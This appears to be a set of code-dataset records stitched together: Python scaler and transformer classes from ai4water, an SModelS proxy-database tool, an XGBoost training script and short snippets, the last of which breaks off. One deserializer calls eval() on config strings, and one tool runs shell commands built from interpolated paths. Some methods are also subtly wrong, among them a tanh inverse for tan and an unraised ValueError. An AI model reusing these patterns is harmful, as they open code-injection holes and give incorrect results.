n_features)\n The transformed data.\n\n Returns\n -------\n X : ndarray of shape (n_samples, n_features)\n The original data.\n \"\"\"\n X = super(PowerTransformer, self).inverse_transform(X)\n\n if self.pre_center:\n X = self.pre_centerer_.inverse_transform(X)\n\n if self.rescale:\n X = self.rescaler_.inverse_transform(X)\n\n return X\n\nclass QuantileTransformer(SKQuantileTransformer, ScalerWithConfig):\n\n @property\n def config_paras(self):\n return ['n_quantiles_', 'references_', 'quantiles_']\n\n @classmethod\n def from_config(cls, config: dict):\n \"\"\"Build the scaler/transformer from config\n\n Arguments:\n config : dictionary of parameters which can be used to build transformer/scaler.\n\n Returns :\n An instance of scaler/transformer\n \"\"\"\n scaler = cls(**config['params'])\n setattr(scaler, '_config', config['config'])\n setattr(scaler, '_from_config', True)\n\n scaler.n_quantiles_ = config['config']['n_quantiles_']\n scaler.references_ = np.array(config['config']['references_'])\n quantiles_ = np.array(config['config']['quantiles_'])\n # make sure it is 2d\n quantiles_ = quantiles_.reshape(len(quantiles_), -1)\n scaler.quantiles_ = quantiles_\n return scaler\n\n\nclass MaxAbsScaler(SKMaxAbsScaler, ScalerWithConfig):\n\n @property\n def config_paras(self):\n return ['scale_', 'n_samples_seen_', 'max_abs_']\n\n\nclass Center(ScalerWithConfig):\n\n def __init__(\n self,\n feature_dim=\"2d\",\n axis=0\n ):\n self.feature_dim = feature_dim\n self.axis = axis\n\n def fit(self, x:np.ndarray):\n dim = x.ndim\n\n mean = np.nanmean(x, axis=self.axis)\n\n setattr(self, 'mean_', mean)\n setattr(self, 'data_dim_', dim)\n return x\n\n def transform(self, x):\n\n return x - self.mean_\n\n def fit_transform(self, x:np.ndarray)->np.ndarray:\n\n self.fit(x)\n return self.transform(x)\n\n def inverse_transform(self, x:np.ndarray)->np.ndarray:\n\n assert x.ndim == self.data_dim_\n return x + self.mean_\n\n @property\n def config_paras(self):\n return ['data_dim_', 'mean_']\n\n def get_params(self):\n return {'feature_dim': self.feature_dim, 'axis': self.axis}\n\nclass Closures(ScalerWithConfig):\n\n def __init__(\n self,\n force_closure:bool = False,\n treat_negative:bool = False\n ):\n\n \"\"\"\n force_closure: bool\n if ture, and input data is not a closure, it will be converted\n into closure by dividing with the sum of input data\n \"\"\"\n self.force_closure = force_closure\n self.treat_negative = treat_negative\n\n def _check_array(self, x):\n\n self.sum_, self.min_ = None, None\n\n if len(x) == x.size:\n x = x.reshape(-1,)\n\n if (x<0).sum() > 0:\n if self.treat_negative:\n self.min_ = np.min(x)\n x = x + self.min_\n else:\n ValueError(f\"x contains {(x[x<0]).sum()} -ve values\")\n\n if not np.allclose(x.sum(), 1.0):\n if self.force_closure:\n self.sum_ = np.sum(x)\n x = x / self.sum_\n else:\n raise ValueError(f\"x is not a closure with sum of {round(x.sum(), 5)}\")\n return x\n\n def _check_array_inv(self, x):\n\n if len(x) == x.size:\n x = x.reshape(-1,)\n\n if self.force_closure:\n x = x * self.sum_\n\n if self.treat_negative:\n x = x - self.min_\n\n return x\n\n def transform(self, x):\n raise NotImplementedError\n\n def fit(self, x):\n return x\n\n def fit_transform(self, x):\n return self.transform(x)\n\n @property\n def config_paras(self)->List[str]:\n return ['sum_', 'min_']\n\n def get_params(self)->dict:\n return {\n 'force_closure': self.force_closure,\n 'treat_negative': self.treat_negative,\n }\n\n\nclass ALR(Closures):\n \"\"\"\n Additive log ratio transformation\n\n Examples\n ---------\n >>> from easy_mpl import hist\n >>> from ai4water.datasets import busan_beach\n >>> data = busan_beach()\n\n >>> alr_tr = ALR(True, True)\n >>> x = data.iloc[:, 0].values\n >>> x_ = alr_tr.fit_transform(x)\n >>> _x = alr_tr.inverse_transform(x_)\n >>> np.allclose(_x, x)\n True\n >>> hist([x, x_], hist_kws={\"bins\": 100}, share_axes=False,\n ... labels=[\"Original\", \"Transformed\"])\n \"\"\"\n def transform(self, x):\n\n denominator_idx = 0\n x = self._check_array(x)\n self.x0_ = x[denominator_idx]\n\n if x.ndim == 2:\n mat_t = x.T\n numerator_idx = list(range(0, mat_t.shape[0]))\n del numerator_idx[denominator_idx]\n x = np.log(mat_t[numerator_idx, :] / mat_t[denominator_idx, :]).T\n\n elif x.ndim == 1:\n numerator_idx = list(range(0, x.shape[0]))\n del numerator_idx[denominator_idx]\n x = np.log(x[numerator_idx] / x[denominator_idx])\n x = np.roll(np.append(x, self.x0_), shift=1)\n\n else:\n raise ValueError(\"mat must be either 1D or 2D\")\n return x\n\n def inverse_transform(self, x):\n\n denominator_idx = 0\n x = np.array(x)\n\n if x.ndim == 2:\n mat_idx = np.insert(x, denominator_idx,\n np.repeat(0, x.shape[0]), axis=1)\n comp = np.zeros(mat_idx.shape)\n comp[:, denominator_idx] = 1 / (np.exp(x).sum(axis=1) + 1)\n numerator_idx = list(range(0, comp.shape[1]))\n del numerator_idx[denominator_idx]\n for i in numerator_idx:\n comp[:, i] = comp[:, denominator_idx] * np.exp(mat_idx[:, i])\n elif x.ndim == 1:\n mat_idx = np.insert(x, denominator_idx, 0, axis=0)\n comp = np.zeros(mat_idx.shape)\n comp[denominator_idx] = 1 / (np.exp(x).sum(axis=0) + 1)\n numerator_idx = list(range(0, comp.shape[0]))\n del numerator_idx[denominator_idx]\n for i in numerator_idx:\n comp[i] = comp[denominator_idx] * np.exp(mat_idx[i])\n else:\n raise ValueError(\"mat must be either 1D or 2D\")\n\n x = self._check_array_inv(x)\n\n return x\n\n\nclass CLR(Closures):\n \"\"\"centre log ratio transformation\n\n Examples\n ---------\n >>> from easy_mpl import hist\n >>> from ai4water.datasets import busan_beach\n >>> data = busan_beach()\n\n >>> clr_tr = CLR(True, True)\n >>> x = data.iloc[:, 0].values\n >>> x_ = clr_tr.fit_transform(x)\n >>> _x = clr_tr.inverse_transform(x_)\n >>> np.allclose(_x, x)\n True\n >>> hist([x, x_], hist_kws={\"bins\": 100}, share_axes=False,\n ... labels=[\"Original\", \"Transformed\"])\n \"\"\"\n\n def transform(\n self,\n x:np.ndarray\n )->np.ndarray:\n\n x = self._check_array(x)\n\n lmat = np.log(x)\n gm = lmat.mean(axis=-1, keepdims=True)\n return (lmat - gm).squeeze()\n\n\n def inverse_transform(self, x:np.ndarray)->np.ndarray:\n emat = np.exp(x)\n x = closure(emat, out=emat)\n\n x = self._check_array_inv(x)\n\n return x\n\n\nclass FuncTransformer(ScalerWithConfig):\n\n \"\"\"function transformer. Transforms the array element wise.\"\"\"\n @property\n def func(self):\n raise NotImplementedError\n\n @property\n def inv_func(self):\n raise NotImplementedError\n\n def fit(self, X, y=None):\n return self\n\n def fit_transform(self, x:np.ndarray)->np.ndarray:\n return self.transform(x)\n\n def transform(self, x:np.ndarray)-> np.ndarray:\n\n setattr(self, 'data_dim_', np.ndim(x))\n return self.func(x)\n\n def inverse_transform_without_fit(self, x):\n return self._inverse_transform(x, False)\n\n def _inverse_transform(self, x, check_dim=True):\n return self.inv_func(x)\n\n def inverse_transform(self, x):\n return self._inverse_transform(x)\n\n @property\n def config_paras(self):\n return ['data_dim_']\n\n def get_params(self):\n return {}\n\n\nclass SqrtScaler(FuncTransformer):\n\n @property\n def func(self):\n return np.sqrt\n\n @property\n def inv_func(self):\n return np.square\n\n\nclass LogScaler(FuncTransformer):\n\n @property\n def func(self):\n return np.log\n\n @property\n def inv_func(self):\n return np.exp\n\n\nclass Log2Scaler(FuncTransformer):\n\n @property\n def func(self):\n return np.log2\n\n @property\n def inv_func(self):\n return lambda x: np.power(2, x)\n\n\nclass Log10Scaler(FuncTransformer):\n\n @property\n def func(self):\n return np.log10\n\n @property\n def inv_func(self):\n return lambda x: np.power(10, x)\n\n\nclass TanScaler(FuncTransformer):\n\n @property\n def func(self):\n return np.tan\n\n @property\n def inv_func(self):\n return np.tanh\n\n\nclass LogisticSigmoidTransformer(FuncTransformer):\n \"\"\"logistic sigmoid transformer.\n Note that inverse transform of logistic sigmoid does not return\n original array.\n \"\"\"\n @property\n def func(self):\n return expit\n\n @property\n def inv_func(self):\n raise ValueError(\"inverse transform of sigmoid can not be computed\")\n\n\nclass HyperbolicTangentTransformer(FuncTransformer):\n \"\"\"Hyperbolic tangent\"\"\"\n @property\n def func(self):\n return np.tanh\n\n @property\n def inv_func(self):\n raise ValueError(\"inverse transform of tanh can not be computed\")\n\n\nclass CumsumScaler(FuncTransformer):\n\n def __init__(\n self,\n feature_dim: str = \"2d\"\n ):\n \"\"\"\n Arguments:\n feature_dim:\n whether the features are 2 dimensional or 1 dimensional. Only\n relevant if the `x` to `fit_transform` is 3D. In such as case\n if feature_dim is `1D`, it will be considered that the x consists\n of following shape (num_examples, time_steps, num_features)\n\n \"\"\"\n assert feature_dim in (\"1d\", \"2d\")\n self.feature_dim = feature_dim\n\n def fit_transform(self, x:np.ndarray) -> np.ndarray:\n self.data_dim_ = np.ndim(x)\n\n dim = np.ndim(x)\n\n if dim == 3 and self.feature_dim == \"1d\":\n _x = np.full(x.shape, np.nan)\n for time_step in range(x.shape[1]):\n _x[:, time_step] = self.func(x[:, time_step], axis=0)\n else:\n _x = np.cumsum(x, axis=0)\n\n return _x\n\n def inverse_transform(self, x):\n\n dim = x.ndim\n assert dim == self.data_dim_, f\"dimension of data changed from {self.data_dim_} to {dim}\"\n\n if dim == 3 and self.feature_dim == \"1d\":\n _x = np.full(x.shape, np.nan)\n for time_step in range(x.shape[1]):\n _x[:, time_step] = np.diff(x[:, time_step], axis=0, append=0)\n\n elif 2 <= dim < 4:\n _x = np.diff(x, axis=0, append=0)\n else:\n raise ValueError(f\" dimension {dim} not allowed\")\n\n return _x\n\n\nclass FunctionTransformer(SKFunctionTransformer):\n \"\"\"Serializing a custom func/inverse_func is difficult. Therefore\n we expect the func/inverse_func to be either numpy function or\n the code as a string.\n\n Methods\n -------\n from_config\n\n Attributes\n ----------\n inverse_func_ser\n\n Example\n -------\n >>> array = np.random.randint(1, 100, (20, 2))\n >>> transformer = FunctionTransformer(func=np.log2,\n >>> inverse_func=\"lambda _x: 2**_x\", validate=True)\n >>> t_array = transformer.fit_transform(array)\n >>> transformer.config()\n >>> new_transformer = FunctionTransformer.from_config(transformer.config())\n >>> original_array = new_transformer.inverse_transform(t_array)\n\n \"\"\"\n def __init__(self, func=None, inverse_func=None, validate=False,\n accept_sparse=False, check_inverse=True, kw_args=None,\n inv_kw_args=None):\n\n # if inverse_func is string, we save a serialized version of it in memory\n # to save it in config later.\n self.inverse_func_ser = inverse_func\n\n super().__init__(func=func,\n inverse_func=inverse_func,\n validate=validate,\n accept_sparse=accept_sparse,\n check_inverse=check_inverse,\n kw_args=kw_args,\n inv_kw_args=inv_kw_args)\n\n @property\n def inverse_func(self):\n return self._inverse_func\n\n @inverse_func.setter\n def inverse_func(self, func):\n self._inverse_func = self.deserialize_func(func)\n\n @property\n def inverse_func_ser(self):\n return self._inverse_func_ser\n\n @inverse_func_ser.setter\n def inverse_func_ser(self, func):\n self._inverse_func_ser = self.serialize_func(func)\n\n @classmethod\n def from_config(cls, config: dict):\n \"\"\"Build the estimator from config file\"\"\"\n\n func = cls.deserialize_func(config.pop('func'))\n\n # do not deserialize inverse_func here, it will be done in init method\n scaler = cls(func=func, inverse_func=config.pop('inverse_func'), **cls.deserialize(**config))\n\n setattr(scaler, '_from_config', True)\n\n return scaler\n\n @staticmethod\n def deserialize_func(func):\n if func is not None:\n if isinstance(func, str):\n if func in np.__dict__:\n func = getattr(np, func)\n else:\n func = eval(func)\n elif isinstance(func, np.ufunc): # np.log2\n func = func\n elif func.__name__ in np.__dict__: # np.diff\n func = func\n else:\n raise ValueError(f\"{func}\")\n\n return func\n\n def config(self) -> dict:\n \"\"\"Returns all the parameters in scaler in a dictionary\"\"\"\n\n params = self.get_params()\n _config = dict()\n _config['func'] = self.serialize_func(self.func)\n _config['inverse_func'] = self.inverse_func_ser\n _config['kw_args'] = jsonize(self.kw_args)\n _config['inv_kw_args'] = jsonize(self.inv_kw_args)\n\n for k, v in params.items():\n if k not in _config:\n _config.update({k: v})\n\n return _config\n\n @staticmethod\n def deserialize(**kwargs):\n _kwargs = {}\n for k, v in kwargs.items():\n if v == \"None\":\n v = None\n _kwargs[k] = v\n\n return _kwargs\n\n @staticmethod\n def serialize_func(func):\n\n if type(func) == np.ufunc:\n func = func.__name__\n\n elif func.__class__.__name__ == \"function\" and func.__module__ == \"numpy\":\n func = func.__name__\n\n elif func is not None:\n if isinstance(func, str):\n func = f\"\"\"{func}\"\"\"\n else:\n raise ValueError(f\"{func} is not serializable\")\n\n return func\n\n\nclass ParetoTransformer(ScalerWithConfig):\n \"\"\"\n Similar to zscore/StandardScaler, but instead of dividing by standard\n deviation, it devides by square root of standard deviation [11]_ and [12]_.\n\n The standard score of a sample `x` is calculated as:\n :: math\n z = (x - u) / sqrt(s)\n\n \"\"\"\n def __init__(\n self,\n feature_dim=\"2d\",\n axis=0\n ):\n self.feature_dim = feature_dim\n self.axis = axis\n\n def _reset(self):\n for arg in ['mean_', 'var_', 'scale_', 'data_dim_']:\n setattr(self, arg, None)\n return\n\n def fit(self, X, y=None):\n self._reset()\n self.data_dim_ = np.ndim(X)\n\n self.mean_ = np.nanmean(X, axis=self.axis)\n self.scale_ = np.sqrt(np.nanvar(X, axis=self.axis))\n self.var_ = np.nanvar(X, axis=self.axis)\n\n return self\n\n def transform(self, X, y=None):\n\n assert np.ndim(X) == self.data_dim_\n\n X = X - self.mean_\n\n return X / np.sqrt(self.scale_)\n\n def fit_transform(self, X, y=None):\n return self.fit(X, y=y).transform(X)\n\n def inverse_transform(self, X):\n X = X * np.sqrt(self.scale_)\n return X + self.mean_\n\n @property\n def config_paras(self):\n return ['data_dim_', 'mean_', 'var_', 'scale_']\n\n def get_params(self):\n return {'feature_dim': self.feature_dim, \"axis\": self.axis}\n\n\nclass VastTransformer(ParetoTransformer):\n \"\"\"\n Variable Stability Scaling following the works of Nicholson et al., 2003 [11]_\n and van der Berg et al., 2006 [12]_ .\n\n The standard score of a sample `x` is calculated as:\n :: math\n z = (x - u) / s * u/s\n\n .. [11] https://doi.org/10.1016/S0003-2670(03)00094-1\n .. [12] https://doi.org/10.1186/1471-2164-7-142\n\n \"\"\"\n\n def transform(self, X, y=None):\n\n assert np.ndim(X) == self.data_dim_\n\n X = X - self.mean_\n X = X / self.scale_\n # coefficient of variation\n cv = np.divide(self.mean_ , self.scale_)\n return X * cv\n\n def inverse_transform(self, X, y=None):\n cv = np.divide(self.mean_ , self.scale_)\n X = X / cv\n X = X * self.scale_\n X = X + self.mean_\n return X\n\n\nclass MmadTransformer(ScalerWithConfig):\n \"\"\"\n Median and median absolute deviation following Jain et al., 2005[13]_ and\n Singh and Singh 2020 [14]_.\n\n The standard score of a sample `x` is calculated as:\n :: math\n z = (x - median) / MAD\n\n .. [13] https://doi.org/10.1016/j.patcog.2005.01.012\n .. [14] https://doi.org/10.1016/j.asoc.2019.105524\n \"\"\"\n def __init__(\n self,\n feature_dim=\"1d\",\n axis=0\n ):\n self.feature_dim = feature_dim\n self.axis = axis\n\n def get_params(self):\n return {'feature_dim': self.feature_dim, \"axis\": self.axis}\n\n def _reset(self):\n for arg in ['med_', 'mad_', 'data_dim_']:\n setattr(self, arg, None)\n return\n\n def fit(self, X, y=None):\n \"\"\"fits the data i.e. calculates median and MAD of the data.\n These parameters will be used during transform.\n \"\"\"\n self._reset()\n self.data_dim_ = np.ndim(X)\n self.med_ = np.nanmedian(X, axis=self.axis)\n\n self.mad_ = np.nanmedian(np.absolute(X - self.med_), axis=self.axis)\n\n return self\n\n def transform(self, X, y=None):\n \"\"\"transforms the data i.e. changes the data using the parameters calculated\n during ``fit``.\n \"\"\"\n assert np.ndim(X) == self.data_dim_\n X = X - self.med_\n return X / self.mad_\n\n def fit_transform(self, X, y=None):\n \"\"\"First calls fit and then calls transform.\"\"\"\n return self.fit(X, y=y).transform(X)\n\n def inverse_transform(self, X):\n \"\"\"inverse transforms the X i.e. brings the X to original scale by using\n the parameters calculated during ``fit``.\"\"\"\n X = X * self.mad_\n return X + self.med_\n\n @property\n def config_paras(self):\n return ['data_dim_', 'med_', 'mad_']\n\n\ndef closure(mat, out=None):\n mat = np.atleast_2d(mat)\n if out is not None:\n out = np.atleast_2d(out)\n if np.any(mat < 0):\n raise ValueError(\"Cannot have negative proportions\")\n if mat.ndim > 2:\n raise ValueError(\"Input matrix can only have two dimensions or less\")\n norm = mat.sum(axis=1, keepdims=True)\n if np.any(norm == 0):\n raise ValueError(\"Input matrix cannot have rows with all zeros\")\n return np.divide(mat, norm, out=out).squeeze()\n","repo_name":"AtrCheema/AI4Water","sub_path":"ai4water/preprocessing/transformations/_transformations.py","file_name":"_transformations.py","file_ext":"py","file_size_in_byte":29094,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"6007320576","text":"#!/usr/bin/env python3\n\nfrom smodels.tools.databaseClient import DatabaseClient\nfrom smodels.experiment.databaseObj import Database\nimport socket, os, subprocess, copy, time #, tempfile\n\nclass ProxyDBCreater:\n def __init__ ( self, inputfile, rundir, verbose=\"info\" ):\n self.inputfile = inputfile\n self.rundir = rundir\n self.nr = 0\n self.verbstring = verbose\n if type(verbose)==int:\n self.verbose = verbose\n else:\n verbose = verbose.lower()\n verbs = { \"err\": 10, \"warn\": 20, \"info\": 30, \"debug\": 40 }\n self.verbose = 50\n for k,v in verbs.items():\n if k in verbose:\n self.verbose = v\n self.database = Database ( self.inputfile )\n\n def create ( self, servername, serverport ):\n if servername == None:\n servername = socket.gethostname()\n self.pprint ( \"determined servername as '%s'\" % servername )\n if serverport == None:\n serverport = 31770\n self.servername = servername\n self.serverport = serverport\n self.database.client = DatabaseClient ( servername, serverport,\n verbose=self.verbstring, rundir = self.rundir, clientid = self.nr )\n for e,expRes in enumerate(self.database.expResultList):\n for d,dataset in enumerate(expRes.datasets):\n for t,txn in enumerate(dataset.txnameList):\n self.database.expResultList[e].datasets[d].txnameList[t].dbClient = copy.copy ( self.database.client )\n del self.database.expResultList[e].datasets[d].txnameList[t].txnameData.tri\n if txn.txnameDataExp != None:\n del self.database.expResultList[e].datasets[d].txnameList[t].txnameDataExp.tri\n\n def pprint ( self, *args ):\n if self.verbose > 25:\n print ( \"[proxyDBCreater-%s] %s\" % \\\n ( time.strftime(\"%H:%M:%S\"), \" \".join(map(str,args)) ) )\n\n def store ( self, outputfile ):\n \"\"\" store the outputfile \"\"\"\n self.outputfile = outputfile\n self.pprint ( \"writing to %s\" % outputfile )\n if os.path.exists ( outputfile ):\n os.unlink ( outputfile )\n ## first create it as temporary file, then move\n tempf = outputfile + \".tmp\" # tempfile.mktemp ( suffix=\".pcl\" )\n self.database.createBinaryFile ( tempf )\n #cmd = f\"mv {tempf} {outputfile}\"\n #subprocess.getoutput ( cmd )\n os.rename ( tempf, outputfile ) ## would only work on same device\n\n def symlink ( self ):\n \"\"\" set a symlink from self.outputfile to default.pcl \"\"\"\n dirname = os.path.dirname ( self.outputfile )\n symfile = f\"{dirname}/default.pcl\"\n self.pprint ( \"setting a symlink from %s to %s\" % \\\n ( self.outputfile, symfile ) )\n if os.path.exists ( symfile ):\n os.unlink ( symfile )\n cmd = f\"ln -s {self.outputfile} {symfile}\"\n subprocess.getoutput ( cmd )\n\n def run ( self, really ):\n \"\"\" now run the server\n :param really: if False, then only write out command\n \"\"\"\n dirname = os.path.dirname ( __file__ )\n inputfile = self.inputfile\n #if not \"/\" in inputfile:\n # inputfile = os.getcwd() + \"/\" + inputfile\n servercmd = \"%s/databaseServer.py -R %s -p %d -d %s -v %s\" % \\\n ( dirname, self.rundir, self.serverport, inputfile, self.verbstring )\n if really:\n self.pprint ( \"starting a server on %s: %s\" % \\\n ( self.servername, servercmd ) )\n import subprocess\n a = subprocess.getoutput ( servercmd )\n self.pprint ( \"output %s\" % a )\n else:\n print ( \"not started a server. you can start one yourself:\" )\n self.pprint ( servercmd )\n\n\ndef main ( args ): ## needed for smodelsTools\n creater = ProxyDBCreater ( args.inputfile, args.rundir, args.verbose )\n creater.create( args.servername, args.serverport )\n creater.store ( args.outputfile )\n if args.symlink:\n creater.symlink()\n creater.run ( args.run )\n\nif __name__ == \"__main__\":\n import sys\n args = \"\"\n for i in sys.argv[1:]:\n if \" \" in i or \",\" in i:\n i = '\"%s\"' % i\n args += i + \" \"\n cmd = \"./smodelsTools.py proxydb %s\" % args \n print ( \"call %s\" % cmd )\n #a = subprocess.getoutput ( cmd )\n #print ( a )\n","repo_name":"SModelS/smodels","sub_path":"smodels/tools/proxyDBCreator.py","file_name":"proxyDBCreator.py","file_ext":"py","file_size_in_byte":4492,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"9590519025","text":"def solution(N):\n if N <= 99:\n return N\n \n answer = N\n\n for i in range(100, N+1):\n tmp = list(str(i))\n D = int(tmp[0]) - int(tmp[1])\n for j in range(2, len(tmp)):\n if int(tmp[j - 1]) - int(tmp[j]) != D:\n answer -= 1\n break\n \n return answer\n\nN = int(input())\n\nprint(solution(N))","repo_name":"mieumje/Python_Coding_Test","sub_path":"BOJ/silver/한수.py","file_name":"한수.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28431475399","text":"import json\n\n\ndef transform(input_path, output_path):\n result = {}\n\n with open(input_path) as fp:\n politics_list = json.load(fp)\n\n for each in politics_list:\n result[each[\"name\"]] = each[\"politics\"]\n\n with open(output_path, 'w') as fp:\n fp.write(json.dumps(result, ensure_ascii=False))\n","repo_name":"g0v/2020voting-guide","sub_path":"crawler/bulletin/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"72"} +{"seq_id":"41970517178","text":"import pandas as pd\nimport numpy as np\nimport gc\nimport xgboost as xgb\nfrom sklearn.cross_validation import train_test_split\n#nrows = 10000 #测试代码用\nnrows = None\ntrain_feature1=pd.read_csv('data/train_feature1.csv', nrows=nrows) \n#train_feature1=pd.read_csv('data/train_feature1_7724875_252.csv')\ntrain_related_feature1=pd.read_csv('data/train_related_feature1.csv', nrows=nrows) \ntrain_related_feature1=train_related_feature1.drop(['orderid','roomid'],axis=1)\ntrain_ismaintype=pd.read_csv('data/features6-18/train_ismaintype.csv', nrows=nrows) \ntrain_newFeature=pd.read_csv('data/features6-18/train_newFeatures43.csv', nrows=nrows) \ntrain_feature3=pd.read_csv('data/train_feature_add3.csv', nrows=nrows) \ntrain_feature4=pd.read_csv('data/newfeature-6-22/train_feature_add4_1.csv', nrows=nrows) \ntrain_feature5=pd.read_csv('data/newfeature-5/add_train5.csv', nrows=nrows) \n\ntrainset=pd.concat([train_feature1,train_related_feature1,train_ismaintype,train_newFeature,train_feature3,train_feature4,train_feature5],axis=1)\nprint(trainset.shape)\n\ndel train_feature1,train_related_feature1,train_ismaintype,train_newFeature,train_feature3,train_feature4,train_feature5\ngc.collect()\n\ntrainset=trainset[(trainset.orderdate_lastord<=trainset.orderdate)&(trainset.user_avgadvanceddate>=0)]#filter some unnormal data (filter 22037 samples, 688 of which label are 1)\n\n#trainset = trainset.drop\n\nuser=trainset[['uid']].drop_duplicates()\n#print user.shape\n#user,testuser=train_test_split(user,test_size=0.5,random_state=0) # select 50% user for training and testing\ntrainuser,testuser=train_test_split(user,test_size=0.2,random_state=0) # split trainset according to user\n#print trainuser.shape\n#print testuser.shape\n\ntrain=trainset[trainset.uid.isin(trainuser.uid)]\nval=trainset[trainset.uid.isin(testuser.uid)]\n\n#print train.shape\n#print val.shape\n\ndel trainset,trainuser,testuser,user\ngc.collect()\n\ntrain_y=train.orderlabel\ntrain_x=train.drop(['orderid','uid','hotelid','basicroomid','roomid','orderlabel','orderid_lastord','hotelid_lastord',\\\n\t 'roomid_lastord','basicroomid_lastord'],axis=1)\nval_y=val.orderlabel\nval_x=val.drop(['orderid','uid','hotelid','basicroomid','roomid','orderlabel','orderid_lastord','hotelid_lastord',\\\n\t 'roomid_lastord','basicroomid_lastord'],axis=1)\ndel train\ndel val\ngc.collect()\n#print '---------------------------------'\n#print train_x.shape\n#print train_y.shape\n#print val_x.shape\n#print val_y.shape\ncol = train_x.columns #由于会出现训练和预测的feature_names mismatch所以通过colname控制\ndtrain=xgb.DMatrix(train_x,label=train_y)\ndel train_x,train_y\ngc.collect()\n\ndval=xgb.DMatrix(val_x,label=val_y)\ndel val_x,val_y\ngc.collect()\n\nparams={'booster':'gbtree',\n\t 'objective': 'binary:logistic',\n\t 'eval_metric':'auc',\n\t 'gamma':0.05,\n\t 'min_child_weight':0.7,\n\t 'max_depth':6,\n\t 'lambda':1,\n\t 'subsample':0.7,\n\t 'colsample_bytree':0.7,\n\t 'colsample_bylevel':0.7,\n\t 'eta': 0.03,\n\t 'tree_method':'exact',\n\t 'seed':0,\n\t 'nthread':35\n\t }\n\n#train on trainset1, evaluate on trainset2\nwatchlist = [(dtrain,'train'),(dval,'val')]\nmodel = xgb.train(params,dtrain,num_boost_round=8000,evals=watchlist,early_stopping_rounds=200)\n#model = xgb.cv(params,dtrain,num_boost_round=5000,nfold=5,metrics='auc',early_stopping_rounds=200,show_stdv=3)\n\n#save_feature score\nmodel.save_model('xgb_8000.model')\n\ndel dtrain,dval\ngc.collect()\n\n#==============================================================================\n# feature_score8000=model.get_fscore()\n# feature_score8000=sorted(feature_score8000.items(),key=lambda x:x[1],reverse=True)\n# fs=[]\n# for (key,value) in feature_score8000:\n# \tfs.append('{0},{1}\\n'.format(key,value))\n# with open('feature_score8000.csv','w') as f:\n# \tf.writelines('feature,score\\n')\n# \tf.writelines(fs)\n#==============================================================================\n\n\ntest_feature1=pd.read_csv('data/test_feature1.csv', nrows=nrows) \n#test_feature1=pd.read_csv('data/test_feature1_7448647_251.csv')\ntest_related_feature1=pd.read_csv('data/test_related_feature1.csv', nrows=nrows) \ntest_related_feature1=test_related_feature1.drop(['orderid','roomid'],axis=1)\ntest_ismaintype=pd.read_csv('data/features6-18/test_ismaintype.csv', nrows=nrows) \ntest_newFeature=pd.read_csv('data/features6-18/test_newFeatures43.csv', nrows=nrows) \ntest_feature3=pd.read_csv('data/test_feature_add3.csv', nrows=nrows) \ntest_feature4=pd.read_csv('data/newfeature-6-22/test_feature_add4_1.csv', nrows=nrows) \ntest_feature5=pd.read_csv('data/newfeature-5/add_test5.csv', nrows=nrows) \n\nreader=pd.concat([test_feature1,test_related_feature1,test_ismaintype,test_newFeature,test_feature3,test_feature4,test_feature5],axis=1)\nprint(reader.shape)\n\n#reader=xgb.DMatrix(reader)\n\ndel test_feature1,test_related_feature1,test_ismaintype,test_newFeature,test_feature3,test_feature4,test_feature5\ngc.collect()\n\n#reader=pd.read_csv('data/testset.csv',chunksize=200000)\nflag=0\ntestset_preds=[]\nfor i in range(38):\n\ttestset=reader[i*200000:(i+1)*200000]\n\tif flag==0:\n\t\ttestset_preds1=testset[['orderid','roomid']]\n\t\ttestset_x=testset.drop(['orderid','uid','hotelid','basicroomid','roomid','orderid_lastord','hotelid_lastord',\\\n\t 'roomid_lastord','basicroomid_lastord'],axis=1)\n\t\ttestset_x=xgb.DMatrix(testset_x[col]) #由于会出现训练和预测的feature_names mismatch所以通过colname控制\n\t\ttestset_preds1['label'] = model.predict(testset_x)\n\t\ttestset_preds=testset_preds1\n\t\tflag=1\n\telse:\n\t\ttestset_preds1=testset[['orderid','roomid']]\n\t\ttestset_x=testset.drop(['orderid','uid','hotelid','basicroomid','roomid','orderid_lastord','hotelid_lastord',\\\n\t 'roomid_lastord','basicroomid_lastord'],axis=1)\n\t\ttestset_x=xgb.DMatrix(testset_x[col])\n\t\ttestset_preds1['label'] = model.predict(testset_x)\n\t\ttestset_preds=pd.concat([testset_preds,testset_preds1],axis=0)\ndel reader\ngc.collect()\ntestset_preds.sort_values(by=['orderid','label'],inplace=True)\ntestset_preds['ranks']=testset_preds.groupby('orderid')['label'].rank(ascending=False)\ntestset_preds.to_csv('fusion_data/full_xgb_submission.csv',index=None)\ntestset_preds=testset_preds[testset_preds.ranks==1]\ntestset_preds[['orderid','roomid']].rename(columns={'roomid':'predict_roomid'}).to_csv('xgb_submission.csv',index=None)\n#print testset_preds.shape","repo_name":"qiaoguan/Kesci-ctrip-room-prediction","sub_path":"train_xgb.py","file_name":"train_xgb.py","file_ext":"py","file_size_in_byte":6346,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"72"} +{"seq_id":"40830653802","text":"from types.user import User\nfrom types.user_mapping import UserMapping\nfrom types.user_group import UserGroup\nfrom types.user_record import UserRecord\nfrom user_groups import UserGroups\nfrom bson.objectid import ObjectId\n\nUSERS_CATEGORY_NAME = 'users'\n\n#----------------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------------\nclass Users():\n def __init__(self, instance):\n self.instance = instance\n\n#----------------------------------------------------------------------------------------------\n def init(self):\n self.cat = self.instance.connection.db[USERS_CATEGORY_NAME]\n\n#----------------------------------------------------------------------------------------------\n def addUser(self, user_spec, group, rights):\n '''add new user. if group_id = None create new user group with user admin rights \n otherwise group_id and rights should be set\n @return boolean value True if success otherwise False'''\n \n UNIQUE_FIELD_NAME = 'email'\n \n out = False\n if not self.get_user_by_name(user_spec[UNIQUE_FIELD_NAME]):\n if group:\n group = self.instance.user_groups.get_user_group(group._id)\n if group:\n user_id = str(ObjectId())\n \n user_spec['_id'] = user_id\n user_spec['group_id'] = group._id\n \n new_user = User(user_spec)\n self.cat.insert(new_user.get())\n \n group.addUserRecord(new_user._id, rights)\n \n self.instance.user_settings.createUserSettings(new_user)\n self.instance.user_groups.update_user_group(group)\n \n out = True\n else:\n print('[Users::addUser] failed get group 